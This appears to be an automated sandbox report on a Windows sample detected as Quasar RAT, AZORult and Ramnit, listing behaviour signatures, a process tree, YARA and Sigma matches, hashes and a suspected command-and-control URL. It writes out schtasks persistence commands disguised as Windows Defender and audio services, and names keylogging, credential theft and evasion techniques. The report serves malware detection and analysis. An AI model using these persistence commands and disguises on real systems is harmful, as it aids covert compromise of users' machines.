
Windows Analysis Report CVbJSUXraQ

Overview

General Information

Sample Name: CVbJSUXraQ (renamed file extension from none to exe)
Analysis ID: 492794
MD5: b0b78da613422be0de8de2e2a2d0ce68
SHA1: a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256: efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
Tags: exe, QuasarRAT
Detection

AZORult, Quasar, Ramnit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Azorult Info Stealer
Antivirus detection for dropped file
Yara detected Quasar RAT
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Ramnit VNC Module
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains VNC / remote desktop functionality (version string found)
Maps a DLL or memory area into another process
Uses known network protocols on non-standard ports
Binary is likely a compiled AutoIt script file
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign process
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for dropped file
AutoIt script contains suspicious strings
Modifies the context of a thread in another process (thread injection)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • CVbJSUXraQ.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\CVbJSUXraQ.exe' MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)
    • vnc.exe (PID: 6296 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)
      • svchost.exe (PID: 5200 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • windef.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
      • schtasks.exe (PID: 5812 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • winsock.exe (PID: 5628 cmdline: C:\Users\user\AppData\Roaming\SubDir\winsock.exe MD5: B4A202E03D4135484D0E730173ABCC72)
        • schtasks.exe (PID: 6504 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CVbJSUXraQ.exe (PID: 4112 cmdline: C:\Users\user\Desktop\CVbJSUXraQ.exe MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)
    • schtasks.exe (PID: 6836 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SystemPropertiesPerformance.exe (PID: 6424 cmdline: C:\Users\user\btpanui\SystemPropertiesPerformance.exe MD5: 9423821A023FB02427783F6385871B3B)
    • vnc.exe (PID: 4420 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)
      • svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • windef.exe (PID: 4100 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
    • schtasks.exe (PID: 2092 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • windef.exe (PID: 6608 cmdline: C:\Users\user\AppData\Local\Temp\windef.exe MD5: B4A202E03D4135484D0E730173ABCC72)
  • windef.exe (PID: 6684 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
  • windef.exe (PID: 7144 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
CVbJSUXraQ.exe | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x1db64a:$s1: DoUploadAndExecute
  • 0x1e0f61:$s2: DoDownloadAndExecute
  • 0x1db420:$s3: DoShellExecute
  • 0x1db842:$s4: set_Processname
  • 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x1aa56d:$op3: 00 04 03 69 91 1B 40
  • 0x1aadcc:$op3: 00 04 03 69 91 1B 40
CVbJSUXraQ.exe | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth
  • 0x1daea0:$x1: GetKeyloggerLogsResponse
  • 0x1db0e0:$s1: DoShellExecuteResponse
  • 0x1d44ce:$s2: GetPasswordsResponse
  • 0x1dafb3:$s3: GetStartupItemsResponse
  • 0x1d179c:$s4: <GetGenReader>b__7
  • 0x1db65e:$s5: RunHidden
  • 0x1db67c:$s5: RunHidden
  • 0x1db68a:$s5: RunHidden
  • 0x1db69e:$s5: RunHidden
CVbJSUXraQ.exe | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
CVbJSUXraQ.exe | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
CVbJSUXraQ.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Vermin_Keylogger_Jan18_1 | Detects Vermin Keylogger | Florian Roth
  • 0x456f4:$x3: GetKeyloggerLogsResponse
  • 0x45bea:$x4: GetKeyloggerLogs
  • 0x45eb1:$s1: <RunHidden>k__BackingField
  • 0x458bc:$s2: set_SystemInfos
  • 0x45eda:$s3: set_RunHidden
  • 0x45ae8:$s4: set_RemotePath
  • 0x56bf8:$s6: Client.exe
  • 0x56c60:$s6: Client.exe
  • 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | xRAT_1 | Detects Patchwork malware | Florian Roth
  • 0x30a28:$x4: xClient.Properties.Resources.resources
  • 0x308e9:$s4: Client.exe
  • 0x45eda:$s7: set_RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x45e9e:$s1: DoUploadAndExecute
  • 0x4b7b5:$s2: DoDownloadAndExecute
  • 0x45c74:$s3: DoShellExecute
  • 0x46096:$s4: set_Processname
  • 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x14354:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x14dc1:$op3: 00 04 03 69 91 1B 40
  • 0x15620:$op3: 00 04 03 69 91 1B 40
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth
  • 0x456f4:$x1: GetKeyloggerLogsResponse
  • 0x45934:$s1: DoShellExecuteResponse
  • 0x3ed22:$s2: GetPasswordsResponse
  • 0x45807:$s3: GetStartupItemsResponse
  • 0x3bff0:$s4: <GetGenReader>b__7
  • 0x45eb2:$s5: RunHidden
  • 0x45ed0:$s5: RunHidden
  • 0x45ede:$s5: RunHidden
  • 0x45ef2:$s5: RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x45e6e:$s1: DoUploadAndExecute
  • 0x4b785:$s2: DoDownloadAndExecute
  • 0x45c44:$s3: DoShellExecute
  • 0x46066:$s4: set_Processname
  • 0x14400:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x14324:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x14d91:$op3: 00 04 03 69 91 1B 40
  • 0x155f0:$op3: 00 04 03 69 91 1B 40
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_ramnitvncmodule | Yara detected Ramnit VNC Module | Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_ramnitvncmodule | Yara detected Ramnit VNC Module | Joe Security
6.0.windef.exe.f10000.0.unpack | Vermin_Keylogger_Jan18_1 | Detects Vermin Keylogger | Florian Roth
  • 0x456f4:$x3: GetKeyloggerLogsResponse
  • 0x45bea:$x4: GetKeyloggerLogs
  • 0x45eb1:$s1: <RunHidden>k__BackingField
  • 0x458bc:$s2: set_SystemInfos
  • 0x45eda:$s3: set_RunHidden
  • 0x45ae8:$s4: set_RemotePath
  • 0x56bf8:$s6: Client.exe
  • 0x56c60:$s6: Client.exe
  • 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe', ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe', ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Avira: detection malicious, Label: TR/Hijacker.W
Yara detected Quasar RAT
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match | File source: dropped/windef.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Multi AV Scanner detection for submitted file
Source: CVbJSUXraQ.exe | Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe | Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe | ReversingLabs: Detection: 86%
Antivirus / Scanner detection for submitted sample
Source: CVbJSUXraQ.exe | Avira: detected
Source: CVbJSUXraQ.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://0x21.in:8000/_az/ | Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Virustotal: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Virustotal: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\windef.exe | ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | ReversingLabs: Detection: 93%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Joe Sandbox ML: detected
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack | Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack | Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack | Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack | Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack | Avira: Label: TR/AD.MoksSteal.elw
                      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: 7_2_0040A610 CryptUnprotectData,LocalFree,
                      Source: CVbJSUXraQ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                      Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: z:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: x:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: v:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: t:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: r:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: p:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: n:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: l:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: j:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: h:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: f:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: b:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: y:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: w:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: u:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: s:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: q:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: o:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: m:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: k:
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exeFile opened: i:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: g:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: e:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: c:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: a:
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
